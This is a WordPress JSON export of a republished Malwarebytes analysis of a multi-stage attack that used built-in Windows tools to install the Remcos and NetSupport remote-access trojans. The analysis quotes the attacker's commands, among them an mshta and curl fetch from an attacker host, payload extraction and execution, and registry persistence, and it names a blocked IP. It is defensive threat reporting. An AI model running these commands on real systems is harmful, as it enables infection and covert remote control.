{"id":36724,"date":"2026-01-21T12:44:54","date_gmt":"2026-01-21T12:44:54","guid":{"rendered":"http:\/\/localhost\/?p=36724"},"modified":"2026-01-21T12:44:54","modified_gmt":"2026-01-21T12:44:54","slug":"can-you-use-too-many-lolbins-to-drop-some-rats","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=36724","title":{"rendered":"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-21T18:05:12&#8243;,&#8221;description&#8221;:&#8221;Recently, our team came across an infection attempt that stood out\u2014not for its sophistication, but for how determined the attacker was to take a \u201cliving off the land\u201d approach to the extreme.\\n\\nThe end goal was to deploy **Remcos** , a Remote Access Trojan (RAT), and **NetSupport Manager** , a legitimate remote administration tool that\u2019s frequently abused as a RAT. The route the attacker took was a veritable tour of Windows\u2019 built-in utilities\u2014known as **LOLBins** (Living Off the Land Binaries).\\n\\nBoth Remcos and NetSupport are widely abused remote access tools that give attackers extensive control over infected systems and are often delivered through multi-stage phishing or infection chains.\\n\\nRemcos (short for Remote Control \\u0026 Surveillance) is sold as a legitimate Windows remote administration and monitoring tool but is widely used by cybercriminals. Once installed, it gives attackers full remote desktop access, file system control, command execution, keylogging, clipboard monitoring, persistence options, and tunneling or proxying features for lateral movement.\\n\\nNetSupport Manager is a legitimate remote support product that becomes \u201cNetSupport RAT\u201d when attackers silently install and configure it for unauthorized access.\\n\\nLet\u2019s walk through how this attack unfolded, one native command at a time.\\n\\n### **Stage 1: The subtle initial access**\\n\\nThe attack kicked off with a seemingly odd command:\\n\\n`C:\\\\Windows\\\\System32\\\\forfiles.exe \/p c:\\\\windows\\\\system32 \/m notepad.exe \/c \\&#8221;cmd \/c start mshta http:\/\/[attacker-ip]\/web\\&#8221;`\\n\\nAt first glance, you might wonder: why not just run `mshta.exe` directly? The answer lies in defense evasion. \\n\\nBy roping in `forfiles.exe`, a legitimate tool for running commands over batches of files, the attacker muddied the waters. This makes the execution path a bit harder for security tools to spot. In essence, one trusted program quietly launches another, forming a chain that\u2019s less likely to trip alarms.\\n\\n### **Stage 2: Fileless download and staging**\\n\\nThe `mshta` command fetched a remote HTA file that immediately spawned `cmd.exe,` which rolled out an elaborate PowerShell one-liner:\\n\\n`powershell.exe -NoProfile -Command`\\n\\n`curl -s -L -o \\&#8221;\\u003crandom\\u003e.pdf\\&#8221; (attacker-ip}\/socket;`\\n\\n`mkdir \\&#8221;\\u003crandom\\u003e\\&#8221;;`\\n\\n`tar -xf \\&#8221;\\u003crandom\\u003e.pdf\\&#8221; -C \\&#8221;\\u003crandom\\u003e\\&#8221;;`\\n\\n`Invoke-CimMethod Win32_Process Create \\&#8221;\\u003crandom\\u003e\\\\glaxnimate.exe\\&#8221;`\\n\\nHere&#8217;s what that does:\\n\\nPowerShell\u2019s built-in curl downloaded a payload disguised as a PDF, which in reality was a TAR archive. Then, `tar.exe` (another trusted Windows add-on) unpacked it into a randomly named folder. The star of this show, however, was `glaxnimate.exe`\u2014a trojanized version of real animation software, primed to further the infection on execution. Even here, the attacker relies entirely on Windows&#8217; own tools\u2014no EXE droppers or macros in sight.\\n\\n### **Stage 3: Staging in plain sight**\\n\\nWhat happened next? The malicious Glaxnimate copy began writing partial files to `C:\\\\ProgramData`:\\n\\n  * `SETUP.CAB.PART`\\n  * `PROCESSOR.VBS.PART`\\n  * `PATCHER.BAT.PART`\\n\\n\\n\\nWhy `.PART` files? It\u2019s classic malware staging. Drop files in a half-finished state until the time is right\u2014or perhaps until the download is complete. Once the coast is clear, rename or complete the files, then use them to push the next payloads forward.\\n\\n![Scripting the core elements of infection](https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2026\/01\/execution_chain.png?w=1024)Scripting the core elements of infection\\n\\n### **Stage 4: Scripting the launch**\\n\\nMalware loves a good script\u2014especially one that no one sees. Once fully written, Windows Script Host was invoked to execute the VBScript component:\\n\\n`\\&#8221;C:\\\\Windows\\\\System32\\\\WScript.exe\\&#8221; \\&#8221;C:\\\\ProgramData\\\\processor.vbs\\&#8221;`\\n\\nThe VBScript used IWshShell3.Run to silently spawn `cmd.exe` with a hidden window so the victim would never see a pop-up or black box. \\n\\n`IWshShell3.Run(\\&#8221;cmd.exe \/c %ProgramData%\\\\patcher.bat\\&#8221;, \\&#8221;0\\&#8221;, \\&#8221;false\\&#8221;);`\\n\\nThe batch file&#8217;s job?\\n\\n`expand setup.cab -F:* C:\\\\ProgramData`\\n\\nUse the `expand` utility to extract all the contents of the previously dropped `setup.cab` archive into ProgramData\u2014effectively unpacking the NetSupport RAT and its helpers.\\n\\n### **Stage 5: Hidden persistence**\\n\\nTo make sure their tool survived a restart, the attackers opted for the stealthy registry route:\\n\\n`reg add \\&#8221;HKCU\\\\Environment\\&#8221; \/v UserInitMprLogonScript \/t REG_EXPAND_SZ \/d \\&#8221;C:\\\\ProgramData\\\\PATCHDIRSEC\\\\client32.exe\\&#8221; \/f`\\n\\nUnlike old-school Run keys, `UserInitMprLogonScript` isn\u2019t a usual suspect and doesn&#8217;t open visible windows. Every time the user logged in, the RAT came quietly along for the ride.\\n\\n## Final thoughts\\n\\nThis infection chain is a masterclass in LOLBin abuse and proof that attackers love turning Windows\u2019 own tools against its users. Every step of the way relies on built-in Windows tools: `forfiles`, `mshta`, `curl`, `tar`, scripting engines, `reg`, and `expand`.\\n\\nSo, can you use too many LOLBins to drop a RAT? As this attacker shows, the answer is \u201cnot yet.\u201d But each additional step adds noise, and leaves more breadcrumbs for defenders to follow. The more tools a threat actor abuses, the more unique their fingerprints become.\\n\\n**Stay vigilant. Monitor potential LOLBin abuse. And never trust a`.pdf` that needs `tar.exe` to open.**\\n\\nDespite the heavy use of LOLBins, Malwarebytes still detects and blocks this attack. It blocked the attacker\u2019s IP address and detected both the Remcos RAT and the NetSupport client once dropped on the system.\\n\\n![Malwarebytes blocks the IP 79.141.162.189](https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2026\/01\/blocked_IP.png)\\n\\n* * *\\n\\n**We don\u2019t just report on threats\u2014we remove them**\\n\\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.&#8221;,&#8221;published&#8221;:&#8221;2026-01-21T17:04:06&#8243;,&#8221;modified&#8221;:&#8221;2026-01-21T17:04:06&#8243;,&#8221;type&#8221;:&#8221;malwarebytes&#8221;,&#8221;title&#8221;:&#8221;Can you use too many LOLBins to drop some RATs?&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA&#8221;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.malwarebytes.com\/blog\/news\/2026\/01\/can-you-use-too-many-lolbins-to-drop-some-rats&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-21T18:05:12&#8243;,&#8221;description&#8221;:&#8221;Recently, our team came across an infection attempt that stood out\u2014not for its sophistication, but for how determined the attacker was to take a \u201cliving&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,115,13,33,7,11,5],"class_list":["post-36724","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-malwarebytes","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=36724\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-21T18:05:12&#8243;,&#8221;description&#8221;:&#8221;Recently, our team came across an infection attempt that stood out\u2014not for its sophistication, but for how determined the attacker was to take a \u201cliving...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=36724\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-21T12:44:54+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36724#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36724\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA\",\"datePublished\":\"2026-01-21T12:44:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36724\"},\"wordCount\":1094,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"malwarebytes\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=36724#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36724\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36724\",\"name\":\"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-21T12:44:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36724#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=36724\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=36724#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=36724","og_locale":"en_US","og_type":"article","og_title":"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-21T18:05:12&#8243;,&#8221;description&#8221;:&#8221;Recently, our team came across an infection attempt that stood out\u2014not for its sophistication, but for how determined the attacker was to take a \u201cliving...","og_url":"https:\/\/zero.redgem.net\/?p=36724","og_site_name":"zero redgem","article_published_time":"2026-01-21T12:44:54+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=36724#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=36724"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA","datePublished":"2026-01-21T12:44:54+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=36724"},"wordCount":1094,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","malwarebytes","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=36724#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=36724","url":"https:\/\/zero.redgem.net\/?p=36724","name":"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-21T12:44:54+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=36724#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=36724"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=36724#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/36724","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=36724"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/36724\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=36724"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=36724"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=36724"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}